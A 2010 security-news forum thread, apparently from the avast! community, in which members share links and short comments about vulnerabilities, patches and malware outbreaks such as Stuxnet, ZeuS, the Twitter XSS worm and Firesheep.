Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
Detailed Info here:
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
asyn
my QuickTime install just got an automatic update, so maybe it fixed that...
-
Hi malware fighters,
0-days will be found here during all of this month: http://www.exploit-db.com/
polonus
-
Microsoft tool for DLL vulnerability interferes with some applications
http://www.h-online.com/open/news/item/Microsoft-tool-for-DLL-vulnerability-interferes-with-some-applications-1069540.html
asyn
Microsoft continues to workaround DLL vulnerability
http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector.aspx
asyn
-
Hackers blind quantum cryptographers
http://www.nature.com/news/2010/100829/full/news.2010.436.html
Hacking commercial quantum cryptography systems by tailored bright illumination
http://www.nature.com/nphoton/journal/vaop/ncurrent/full/nphoton.2010.214.html
Number of vulnerabilities on the rise
http://www.norman.com/security_center/security_center_archive/2010/91886/en
-
Thanks Pondus,
Google Code removed 50 malware after being alerted they were on their servers: http://threatpost.com/en_us/blogs/google-code-discovered-serving-malware-090110
polonus
-
It would be nice if they took a pro-active response to this type of thing, rather than a reactive response waiting for someone to tell them.
-
Hi DavidR,
A bit like a sort of Pontius Pilate comment from Google, also seen in their official policy: "Google actively works to protect our users from malware. Using Google Code, or any of our products, for distribution or coordination of malware is a violation of our product policies, and we will remove any projects discovered to be used for these purposes," a Google spokesman responded in an e-mail message to Threatpost.com.
pol
-
MS probes mystery IE bug
http://www.theregister.co.uk/2010/09/06/mystery_ie_bug/
Microsoft is investigating reports of a new bug in Internet Explorer.
Redmond's Security Response Team (MSRT) said on Friday that it was aware of a "publicly disclosed issue involving Internet Explorer", and promised an investigation, without going into details.
Circumstantial evidence suggests Microsoft is referring to a post by security researcher Chris Evans, of Google, to a Full Disclosure mailing list on Friday, hours before MSRT's tweet.
"A nasty vulnerability exists in the latest Internet Explorer 8," Evans wrote. "I have been unsuccessful in persuading the vendor to issue a fix."
"The bug permits — for example — an arbitrary web site to force the victim to make tweets," he added.
http://twitter.com/msftsecresponse/status/22934606564
(see the article from the register to get the link to the full description, as I'd rather not post this link here)
-
1) Mozilla Patches Firefox DLL Load Hijacking Bug (http://threatpost.com/en_us/blogs/mozilla-patches-firefox-dll-load-hijacking-bug-090810?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
2) Apple Plugs Safari Drive-by Download Security Holes (http://threatpost.com/en_us/blogs/apple-plugs-safari-drive-download-security-holes-090810?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
3) Facebook Apps Pump Out Mobile "Entertainment" Spam (http://threatpost.com/en_us/blogs/facebook-apps-pump-out-mobile-entertainment-spam-090710?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
-
Updated Android Trojan Pushed in SEO Attacks
http://threatpost.com/en_us/blogs/updated-android-trojan-gets-mob-backing-090810?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today's+Most+Popular
-
Beware of Link: E-Mail Virus Plays Havoc With Internet
An e-mail virus swept through the Internet Thursday, snarling traffic and taking down servers at ABC, NASA, Comcast, and Google -- and possibly even affecting the Department of Homeland Security.
http://www.foxnews.com/scitech/2010/09/09/beware-link-e-mail-virus-plays-havoc-internet/?test=latestnews
-
Hi folks,
Hackers target and exploit Pirate bay's Adserver. Also big sites using OpenX were apparently being hacked: http://torrentfreak.com/hackers-target-and-exploit-pirate-bay-ad-server-100913/
pol
-
Old vulnerability in Apple's QuickTime Player allows remote code execution for Windows systems (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91862/en
About the security content of QuickTime 7.6.8
http://support.apple.com/kb/HT4339
-
Old vulnerability in Apple's QuickTime Player allows remote code execution for Windows systems (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91862/en
About the security content of QuickTime 7.6.8
http://support.apple.com/kb/HT4339
Key statement: Update 16 September 2010
Apple has published QuickTime version 7.6.8. This update fixes the vulnerability mentioned above as well as another vulnerability in previous QuickTime versions.
I have version 7.68.75.0
-
Update to Mozilla Firefox solves several critical vulnerabilities (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91922/en
-
ZoneAlarm scares users with "virus alert"
http://www.h-online.com/security/news/item/ZoneAlarm-scares-users-with-virus-alert-1082474.html
asyn
-
I know you've been on vacation Asyn and we discussed that subject while you were enjoying yourself. ;D
http://forum.avast.com/index.php?topic=64019.0
-
I know you've been on vacation Asyn and we discussed that subject while you were enjoying yourself. ;D
Thanks for the hint, Bob - sorry for being late..! ;)
asyn
-
ZoneAlarm slammed for scarewarey marketing ( Warning! Er, buy this anti-virus )
http://www.theregister.co.uk/2010/09/20/zonealarm_scareware_flap/
Check Point defends ZoneAlarm scareware-style warning ( 'We didn't want to scare anybody' )
http://www.theregister.co.uk/2010/09/21/zonealarm_defends_controversial_malware_warning/
Check Point kills scareware-style pop-up campaign ( Waves white flag )
http://www.theregister.co.uk/2010/09/21/check_point_pop_up_row_climb_down/
-
Nothing like shooting yourself in the (public relations) foot.
-
The attitude of ZA is deeply lamentable.
-
agreed, these are almost rogue-like methods ::)
-
Twitter Hack Activates Pop-Ups, Sends Some to Porn Sites
DEVELOPING: Hackers exploited a security flaw on the popular micro-blogging site Twitter, retweeting malicious code, activating pop-ups, and even exposing users to an unwanted sight: hard-core pornography.
As of 9:50 a.m. EST, a post to Twitter's status blog said that the security flaw had been fixed, simply stating "The exploit is fully patched." This confirms what a spokesperson for the company told popular tech news site Mashable ten minutes later: “It should now be fully patched and is no longer exploitable.”
http://www.foxnews.com/scitech/2010/09/21/twitter-mouseover-security-flaw-porn/
-
yeah, about this new Twitter hack: use a Twitter client until you are a hundred percent sure that the issue has been fixed. Clients like TweetDeck etc. are not affected, i.e. hovering over a hacked tweet in a client won't have any effect, like it does from the web (original Twitter in browser) interface.
-
Twitter Hack Activates Pop-Ups, Sends Some to Porn Sites
Users wishing to protect themselves should either disable JavaScript or install an extension such as NoScript to selectively block JavaScript on a per site basis.
More info for the interested...:
http://www.securelist.com/en/blog/2297/Live_Twitter_XSS
http://www.sophos.com/blogs/gc/g/2010/09/21/twitter-onmouseover-security-flaw-widely-exploited/
http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched
asyn
-
Hi Asyn,
Users of Google Chrome can use the NotScript extension for Google Chrome to do something similar,
polonus
-
How to protect yourself from Facebook Places
http://www.sophos.com/blogs/gc/g/2010/09/17/protect-facebook-places/
-
EMI Music servers hacked:
http://blog.unmaskparasites.com/2010/09/25/emi-server-hacked/
It would appear that avast! catches the redirect:
http://www.virustotal.com/file-scan/report.html?id=b361fdbff12cf314aea988161a5fa132516c06d5bf89a843e5aa74f43a427df1-1285526196
(txt.file with the iframe in it)
Would be nice to know if the network shield detects...
-
they say the issue is "solved now", but still:
Malicious Links on Twitter
A malicious link is making the rounds that will post a tweet to your account when clicked on. Twitter has disabled the link, and is currently resolving the issue.
UPDATE Sun Sep 26 18:41:49 UTC 2010: We’ve fixed the exploit and are in the process of removing the offending Tweets.
http://status.twitter.com/post/1192873885/malicious-links-on-twitter
they need to take care of the exploit, not just disable links ;D ...but I guess they're on it.
http://twitter.com/twitter/statuses/25615345589
-
Computer Worm Affects Computers at Iran's First Nuclear Power Station
TEHRAN, Iran -- A complex computer worm capable of seizing control of industrial plants has affected the personal computers of staff working at Iran's first nuclear power station weeks before the facility is to go online, the official news agency reported Sunday.
http://www.foxnews.com/world/2010/09/26/worm-affects-computers-irans-nuclear-power-station/
-
Computer Worm Affects Computers at Iran's First Nuclear Power Station
It's Stuxnet..! ;)
More info here: http://forum.avast.com/index.php?topic=63221.msg544033#msg544033
asyn
-
not a warning, but a security tip (not sure if it fits in this thread):
'Rickroll' protection hits Firefox in add-on form
http://news.cnet.com/8301-27076_3-20017569-248.html
https://addons.mozilla.org/en-US/firefox/addon/230353/
("This add-on has not been reviewed by Mozilla.")
-
http://forum.avast.com/index.php?topic=28748.msg544394#msg544394
-
http://forum.avast.com/index.php?topic=28748.msg544394#msg544394
thanks ;)
(just adding: this is about web places and security >>> a must read for many ;) )
-
Banking trojan ZeuS homes in on SMS-TAN process
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html
asyn
-
Here is more on that
Zeus banking Trojan targets mobile phones too
http://news.cnet.com/8301-27080_3-20017762-245.html
-
DSL, Now Offering Speeds of 700 Mbps
http://gigaom.com/2010/09/22/huawei-takes-copper-to-the-limit-with-700-mbps-dsl/
So there is hope for you David ..... ;D
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
Whilst not a warning, more general security information: http://lifehacker.com/5649025/why-you-should-use-adblock-plus-even-if-you-dont-block-ads
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
Well, that's not really new, but for sure a good reminder... ;)
asyn
-
Here's a new one ;D
How about an iphone 4B ;D ;D ;D
No thanks...
I had two of these...
So it appears to be from Facebook, but it is from a random email address...
And the site is not what it seems...(plus malzilla detects LOADS of redirects...)
Not to mention that it is just wrong...
This just goes to show how careful you have to be with emails...
EDIT:
I win :)
http://www.virustotal.com/url-scan/report.html?id=8772a62f8c506df23373d46c0ba6ca6b-1285693742
http://www.virustotal.com/url-scan/report.html?id=306d0c140d84b573fa41af765a293fab-1285694494
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
It's simple to block ads in IE: Adblock for Internet Explorer
Simple Adblock is an adblocker extension for Internet Explorer designed to make adblocking easy. Simple Adblock blocks all kinds of advertising from websites including flash ads, banner ads, rich media, slide-ins and fly-ins.
http://simple-adblock.com
Also use hpHosts HOSTS file for additional blocking.
-
Out-of-band security update from Microsoft
http://www.norman.com/security_center/security_center_archive/2010/92367/en
-
Out-of-band security update from Microsoft
http://www.norman.com/security_center/security_center_archive/2010/92367/en
Related info here: http://forum.avast.com/index.php?topic=63221.msg542172#msg542172
asyn
-
More Zeus
Zeus botnets' Achilles' Heel makes infiltration easy
http://www.theregister.co.uk/2010/09/27/zeus_botnet_hijacking/
More Stuxnet
Stuxnet worm can reinfect PCs even after disinfection
http://www.theregister.co.uk/2010/09/28/stuxnet_resurrection_ability/
and something new
Researchers up evilness ante with GPU-assisted malware
http://www.theregister.co.uk/2010/09/28/gpu_assisted_malware/
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
No problem, I'm on fibre optics... ;D
asyn
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
We had a bunch of guys that were stealing the batteries out of the relay boxes. >:(
-
not a warning, but a security tip (not sure if it fits in this thread):
'Rickroll' protection hits Firefox in add-on form
http://news.cnet.com/8301-27076_3-20017569-248.html
https://addons.mozilla.org/en-US/firefox/addon/230353/
("This add-on has not been reviewed by Mozilla.")
avast! already protects against some "Rick Roll"s - they are detected as HTML:Agent-X[Joke] ;)
-
Out-of-band security update from Microsoft (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/92367/en
Update 1 October 2010
The security update is now available also as a Windows Update as announced above.
-
Orkut Worm spreading through XSS loophole
http://www.norman.com/security_center/blog/nirmal_and_jyotinder/92415/en
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91954/en
-
Stuxnet worm slithers into China, heralds alien invasion
http://www.theregister.co.uk/2010/10/01/stuxnet_china_analysis/
-
MySQL update addresses DoS vulnerability
http://secunia.com/advisories/41716/
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html
asyn
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
Adobe patches 23 holes in Reader and Acrobat
http://www.h-online.com/security/news/item/Adobe-patches-23-holes-in-Reader-and-Acrobat-1102416.html
asyn
-
Hello community :D
I joined the forums because some minutes ago while downloading a book torrent a friend of mine suggested, this message appeared/appears, in an infinite loop.
After the first few times of it reappearing, I deleted everything that on first glance is related to the particular torrent and ended the process of utorrent, but I am afraid of it having managed to 'dig' deeper in the PC.
Anyway, I have 2 questions.
Should I worry, and why I cannot get rid of the message?
Cheers!
(http://www.imagehosting.gr/out.php/i1461276_utorrent.jpg)
(p.s. I have tried all actions except for 'ignore' and the message still reappears)
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
-
Hello community :D
I joined the forums because some minutes ago while downloading a book torrent a friend of mine suggested, this message appeared/appears, in an infinite loop.
After the first few times of it reappearing, I deleted everything that on first glance is related to the particular torrent and ended the process of utorrent, but I am afraid of it having managed to 'dig' deeper in the PC.
Anyway, I have 2 questions.
Should I worry, and why I cannot get rid of the message?
Cheers!
(p.s. I have tried all actions except for 'ignore' and the message still reappears)
Most torrent files have malware!
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
is it? It's not the virus per se (for now) I have the problem with. It's the message that I cannot get rid of and don't know why.
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
is it? It's not the virus per se (for now) I have the problem with. It's the message that I cannot get rid of and don't know why.
That is because your system is infected with malware! ::)
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
Adobe patches 23 holes in Reader and Acrobat
http://www.h-online.com/security/news/item/Adobe-patches-23-holes-in-Reader-and-Acrobat-1102416.html
asyn
Will there be an update for Foxit Reader? Does the problem also affect it?
-
Will there be an update for Foxit Reader? Does the problem also affect it?
An update does not appear to be necessary. According to Secunia, the current version, Foxit Reader 4.2.0.928, has no public, unpatched vulnerabilities.
http://secunia.com/advisories/product/30682/
-
FTP-Server at risk
Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
http://securityreason.com/securityalert/7822
asyn
-
SORBS.NET - email RBL issues
http://isc.sans.edu/diary.html?storyid=9685
asyn
-
Microsoft Security Bulletins advance notification
http://norman.com/security_center/security_center_archive/2010/80066/en
-
Spam blacklist snafu prompts global gnashing of teeth (Legit IPs blocked in SORBS cockup)
http://www.theregister.co.uk/2010/10/07/sorbs_cockup/
Many email users around the world have been unable to send messages because of ongoing technical problems with a popular service designed to prevent spam from reaching its intended destination.
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
What an absolute load of horse droppings, even if it is a justifiable statement. MS could/should have done more on OS security in the first place, as it is their holes in security that got most people into this mess in the first place.
How is this going to be achieved, as the only real way of defining what is a sick PC is to do a test when they connect. Not that someone doing an unknown/unauthorised probe/scan of your system (privacy/morally/ethically) smacks of Big Brother and is very dubious.
How would one site know not to do this test, etc. without a massive database, yet another privacy issue, or something held at system level that they access to block access, yet more privacy issues. Both of which would I'm sure be targets.
Having blocked so-called sick PCs (and who determines if the patient has a cold or a terminal illness?), how are they to get clean without access to the internet (chicken and egg again)? I sometimes wonder if the people spouting this rubbish have too much so-called intelligence and zero common sense.
-
What an absolute load of horse droppings, even if it is a justifiable statement. MS could/should have done more on OS security in the first place, as it is their holes in security that got most people into this mess in the first place.
I wonder how many infections are actually MS's fault and not third-party software.
Adobe Reader 9, for example, has MORE vulnerabilities than Windows 7. Yes...a PDF reader has more vulnerabilities than an entire OS ::)
-
and the jerks developing malware don't matter I suppose, if the door is open, then come in ??? is that it?
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
Here's the link to the PDF called
"Collective Defense - Applying Public Health Models to the Internet"
http://go.microsoft.com/?linkid=9746317
asyn
-
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
Oracle Java SE and Java for Business Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
asyn
-
MS planning Patch Tuesday whopper: 16 bulletins, 49 vulnerabilities
http://www.zdnet.com/blog/security/ms-planning-patch-tuesday-whopper-16-bulletins-49-vulnerabilities/7433
-
Manipulated card terminals at US ALDI branches
http://www.aldifoods.com/us/media/company/company/Press_Release.pdf
http://www.computerworld.com/s/article/9189982/Aldi_data_breach_shows_payment_terminal_holes
asyn
-
Malware forces Firefox to save passwords
http://www.theregister.co.uk/2010/10/11/firefox_password_malware/
-
WinPatrol blames McAfee for lost business ('False alarm scared off customers')
http://www.theregister.co.uk/2010/10/11/winpatrol_false_positive_mcafee/
-
Die-hard bug bytes Linux kernel for second time (Get your root access here)
http://www.theregister.co.uk/2010/09/15/linux_kernel_regression_bug/
-
WinPatrol blames McAfee for lost business ('False alarm scared off customers')
http://www.theregister.co.uk/2010/10/11/winpatrol_false_positive_mcafee/
Also in:
Interesting Software and System News on October 10, 2010, 11:27:38 AM
http://forum.avast.com/index.php?topic=19387.msg548151#msg548151
-
Most probably it was already posted. I have no patience for searching more than once in the forum ;D
Adobe Reader will be released with a built-in sandbox to avoid exploits.
The sandbox will be on by default. If an exploit -- which is a mechanism developed by an attacker in order to deliver malicious software to a computer -- attacks the application, it won't be able to get out of the sandbox, Arkin said.
http://www.infoworld.com/d/security-central/adobe-more-secure-version-reader-out-year-end-500?source=rss_applications
-
Most probably it was already posted. I have no patience for searching more than once in the forum ;D
Adobe Reader will be released with a built-in sandbox to avoid exploits.
The sandbox will be on by default. If an exploit -- which is a mechanism developed by an attacker in order to deliver malicious software to a computer -- attacks the application, it won't be able to get out of the sandbox, Arkin said.
http://www.infoworld.com/d/security-central/adobe-more-secure-version-reader-out-year-end-500?source=rss_applications
okay... hadn't heard about it yet, good that you posted it. They'll probably release a beta soon then... will check on Adobe labs.
-
Most probably it was already posted. I have no patience for searching more than once in the forum ;D
Adobe Reader will be released with a built-in sandbox to avoid exploits.
Inside Adobe Reader Protected Mode ;)
http://forum.avast.com/index.php?topic=63221.msg547407#msg547407
asyn
-
Thanks Asyn... Couldn't find at first.
-
Thanks Asyn... Couldn't find at first.
No problem, Tech...
asyn
-
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
Oracle Java SE and Java for Business Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
asyn
October 2010 and Java Critical Patch Updates Released
http://blogs.oracle.com/security/2010/10/october_2010_and_java_critical.html
asyn
-
Vulnerabilities in Xpdf affect several open source products
https://rhn.redhat.com/errata/RHSA-2010-0751.html
asyn
-
Microsoft's Security Intelligence Report (SIR) #9
http://www.microsoft.com/security/sir/default.aspx
asyn
-
Facebook introduces one time passwords for insecure computers
http://blog.facebook.com/blog.php?post=436800707130
asyn
-
Security update for BlackBerry server
http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB24547
asyn
-
Google: Phishing URLs and XML Notifications
http://googleonlinesecurity.blogspot.com/2010/10/phishing-urls-and-xml-notifications.html
asyn
-
Microsoft turns on reputation check for IE9
http://www.itnews.com.au/News/235379,microsoft-turns-on-reputation-check-for-ie9.aspx
-
Ruby on Rails update closes vulnerability
http://www.h-online.com/security/news/item/Ruby-on-Rails-update-closes-vulnerability-1108621.html
-
Microsoft Removed 6.5 Million Bots From Windows Machines In Q2
http://www.darkreading.com/vulnerability_management/security/vulnerabilities/showArticle.jhtml?articleID=227701285
-
Microsoft confirms Russian pill-pusher attack on its network ( Is there a Linux admin in the house? )
http://www.theregister.co.uk/2010/10/14/microsoft_confirms_ip_hijack/
Ruskie gang hijacks Microsoft network to push penis pills ( Redmond abused as scammers' IP bitch )
http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/
-
Espionage app updated for Windows phones ( Next destination: Android )
http://www.theregister.co.uk/2010/10/15/smartphone_espionage_suite/
-
ZeuS baddies copy Conficker tactics ( Malware phone-home ploy gets recycled )
http://www.theregister.co.uk/2010/10/15/zeus_conficker_assault/
Look Out, Licat!
http://countermeasures.trendmicro.eu/look-out-licat/
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=b3e3b3d389d48ae056845b8223402e1d27c8950eadaa7ffecaebeda93af73a03-1287136181
ThreatExpert
http://www.threatexpert.com/report.aspx?md5=1e940baeb962042a6628f81c93aaecd1
-
Stealth malware steals, imitates social behavior
http://www.msnbc.msn.com/id/39691794/ns/technology_and_science-security/
Also read,
Malware Aimed at Social Networks May Steal Your Reality
http://www.pcworld.com/article/207659/malware_aimed_at_social_networks_may_steal_your_reality.html?tk=hp_new
-
Fake Stuxnet removal tool will kill your PC
http://www.sync-blog.com/sync/2010/10/stuxnet-removal-tool-is-malware-too.html
It's a shame that avast! is not listed under suggestions...
-
Apple Fixes Bugs in Remote App 2.0.1 Update
http://www.pcworld.com/businesscenter/article/207976/apple_fixes_bugs_in_remote_app_201_update.html
-
Apple Fixes Bugs in Remote App 2.0.1 Update
http://www.pcworld.com/businesscenter/article/207976/apple_fixes_bugs_in_remote_app_201_update.html
Can you post this under the new Smart Phones Update thread: http://forum.avast.com/index.php?topic=65103.0. Thank you.
-
Hi Safesurf,
I've just realised that you've created such a nice thread!
I'll post this right away ;D
-
Hi Safesurf,
I've just realised that you've created such a nice thread!
I'll post this right away ;D
Thank you. :)
-
***
From the Wall Street Journal:
Report: Facebook apps transmitted personal info
"The Wall Street Journal is reporting that 10 popular Facebook applications have been transmitting users' personal identifying information to dozens of advertising and Internet tracking companies."
http://my.earthlink.net/article/top?guid=20101018/2b65b90d-a821-441e-939e-b119ebb89c03
***
-
Microsoft: ‘Unprecedented Wave of Java Exploitation’
http://krebsonsecurity.com/2010/10/microsoft-a-tidal-wave-of-java-exploitation/
asyn
-
Security problems in media players
http://www.h-online.com/security/news/item/Security-problems-in-media-players-1109782.html
asyn
-
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
http://seclists.org/fulldisclosure/2010/Oct/257
asyn
-
New malware technique targets intrusion-prevention systems
http://www.networkworld.com/news/2010/101810-malware-targets-ips.html?t51hb
-
Fake Twitter homepages serving malware
http://www.net-security.org/malware_news.php?id=1498
-
Microsoft nukes Zeus malware from 275,000 Windows machines
Microsoft is claiming major success at cleaning the notorious Zeus crimeware trojan from infected Windows machines.
One week after adding detections into its malicious software removal tool, Microsoft said it nuked Zeus (also called Zbot) 281,491 times from 274,873 computers.
http://www.zdnet.com/blog/security/microsoft-nukes-zeus-malware-from-275000-windows-machines/7481?tag=nl.e589
-
RealPlayer Security Updates Published (http://boelectronic.blogspot.com/2010/10/realplayer-security-updates-published.html)
Facebook Privacy Breach: Users' Info Leaked To Advertising, Tracking Firms (http://boelectronic.blogspot.com/2010/10/facebook-privacy-breach-users-info.html)
-
Trojan trouble at Lenovo
http://www.h-online.com/security/news/item/Trojan-trouble-at-Lenovo-1110581.html
asyn
-
Hole in Linux kernel provides root rights
http://www.vsecurity.com/resources/advisory/20101019-1/
asyn
-
WoW Patch Brings Out the Malware Trolls
http://blog.webroot.com/2010/10/20/wow-patch-brings-out-the-malware-trolls
-
Hackers subvert Firefox security warnings to sling scareware
http://www.theregister.co.uk/2010/10/20/scareware_scumbags_subvert_firefox_security_warnings/
-
RealPlayer Security Updates Published (http://boelectronic.blogspot.com/2010/10/realplayer-security-updates-published.html)
Strange how there are no updates for the latest version 1.1.5 :S
-
Critical vulnerability in Adobe Shockwave Player - no update available
http://www.norman.com/security_center/security_center_archive/2010/128624/en
A critical vulnerability has been identified in Adobe Shockwave Player 11.5.8.612 and earlier versions. Details about the vulnerability have been published on the Internet, and malware that utilizes this may be expected to appear.
-
Critical vulnerability in Adobe Shockwave Player - no update available
http://www.norman.com/security_center/security_center_archive/2010/128624/en
A critical vulnerability has been identified in Adobe Shockwave Player 11.5.8.612 and earlier versions. Details about the vulnerability have been published on the Internet, and malware that utilizes this may be expected to appear.
More on this:
http://www.exploit-db.com/exploits/15296/
http://blogs.adobe.com/psirt/2010/10/security-advisory-for-adobe-shockwave-player-apsa10-04.html
asyn
-
Apple releases Java security updates
http://www.h-online.com/security/news/item/Apple-releases-Java-security-updates-1122472.html
asyn
-
New malware technique targets intrusion-prevention systems
http://www.networkworld.com/news/2010/101810-malware-targets-ips.html?t51hb
Alarms for online networks largely useless
http://www.h-online.com/security/news/item/Alarms-for-online-networks-largely-useless-1123028.html
asyn
-
Pidgin 2.7.4 closes DoS vulnerability
http://pidgin.im/news/security/?id=48
http://developer.pidgin.im/wiki/ChangeLog
asyn
-
CompTIA - upcoming discussion on security culprits and costs
http://www.scmagazineus.com/costs-and-causes-of-data-loss-incidents-to-be-discussed/article/181252/
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Can you please post a link to the test result too (from NSS)? I followed the link posted on NSS Labs and it opened a blank page.
-
Top right corner, click the "FREE REPORT" link; that should give you a PDF file.
http://www.nsslabs.com/research/endpoint-security/anti-malware/consumer-anti-malware-products:-group-test-report-q3-2010.html
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Being discussed at Wilders: http://www.wilderssecurity.com/showthread.php?t=284754
And Comodo: https://forums.comodo.com/empty-t63917.0.html;topicseen
-
Top right corner, click the "FREE REPORT" link; that should give you a PDF file.
http://www.nsslabs.com/research/endpoint-security/anti-malware/consumer-anti-malware-products:-group-test-report-q3-2010.html
This time the link worked ;)
I like the AVG result >:)
-
Siemens Stuxnet patch does not provide sufficient protection
http://www.h-online.com/security/news/item/Siemens-Stuxnet-patch-does-not-provide-sufficient-protection-1123815.html
asyn
-
Facebook proposes encryption to stop third party data thieves
http://www.theinquirer.net/inquirer/news/1810100/facebook-proposes-encryption-stop-party-theives
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Being discussed at Wilders: http://www.wilderssecurity.com/showthread.php?t=284754
And Comodo: https://forums.comodo.com/empty-t63917.0.html;topicseen
Round here everyone is not losing the battle, primarily because they have security products ;D
It wasn't always like this. Infected computers still come in through the front door from the wild.
Mostly avast users now run a real-time antivirus as resident, with other security products.
-
Kaspersky Anti-Virus cripples Servers
http://www.h-online.com/security/news/item/Kaspersky-Anti-Virus-cripples-Servers-1124659.html
asyn
-
Iranian Cyber Army Moves Into Botnets
http://www.pcworld.com/businesscenter/article/208670/iranian_cyber_army_moves_into_botnets.html
-
Reports: Click fraud, malware increasing
http://www.bizreport.com/2010/10/reports-click-fraud-malware-increasing.html
-
SpyEye v. ZeuS Rivalry Ends in Quiet Merger
http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/
asyn
-
Critical vulnerability in Firefox 3.5 and Firefox 3.6
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
https://bugzilla.mozilla.org/show_bug.cgi?id=607222 [dev rights needed]
http://blog.trendmicro.com/firefox-zero-day-found-in-compromised-nobel-peace-prize-website/
asyn
-
What's the riskiest country to visit -- on the Web?
http://technolog.msnbc.msn.com/_news/2010/10/26/5355098-whats-the-riskiest-country-to-visit-on-the-web
-
The Rise of the Small Botnet
Smaller botnets are cheaper and easier to build out and operate, and criminals have already realized that large-scale botnets attract unwanted attention
http://www.securityweek.com/rise-small-botnet
-
Critical vulnerability in Firefox 3.5 and Firefox 3.6
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
https://bugzilla.mozilla.org/show_bug.cgi?id=607222 [dev rights needed]
http://blog.trendmicro.com/firefox-zero-day-found-in-compromised-nobel-peace-prize-website/
asyn
Updates available..!! That was fast...!! :)
https://developer.mozilla.org/devnews/index.php/2010/10/27/firefox-3-6-12-and-3-5-15-security-updates-now-available/
https://developer.mozilla.org/devnews/index.php/2010/10/27/thunderbird-3-1-6-and-3-0-10-security-updates-now-available/
asyn
-
Trojan Horse OSX/Koobface.A Affects Mac OS X
Koobface Variant Spreads via Facebook, Twitter and More
http://blog.intego.com/2010/10/27/intego-security-memo-trojan-horse-osxkoobface-a-affects-mac-os-x-mac-koobface-variant-spreads-via-facebook-twitter-and-more/
http://www.securemac.com/boonana-bulletin.php
asyn
-
Security problems in media players
http://www.h-online.com/security/news/item/Security-problems-in-media-players-1109782.html
asyn
Nullsoft closes holes in Winamp
http://forums.winamp.com/showthread.php?t=322995
http://secunia.com/secunia_research/2010-95/
asyn
-
A new vulnerability in Adobe products:
http://www.adobe.com/support/security/advisories/apsa10-05.html
-
CiscoWorks Common Services Arbitrary Code Execution Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20101027-cs.shtml
asyn
-
"Your are infected with Bredolab" Message Problem
http://norman.com/security_center/blog/righard_zwienenberg/129332/en-us
Hey, your computer is infected!
http://norman.com/security_center/security_center_archive/2010/129405/en-us
Undead Bredolab zombie network lashes out from the grave (Someone's still pulling the strings)
http://www.theregister.co.uk/2010/10/29/bredolab_botnet_death_throes/
-
***
Using Wi-Fi? Firesheep may endanger your security
"Most internet users hear -- and dismiss -- warnings about security problems on open Wi-Fi networks. The advent of Firesheep, coupled with the booming popularity of account-based online services such as Twitter, means that no one can afford to continue to ignore online security."
http://edition.cnn.com/2010/TECH/mobile/11/01/firesheep.wifi.security/
***
-
Spontaneous worldwide reboot of Check Point appliances
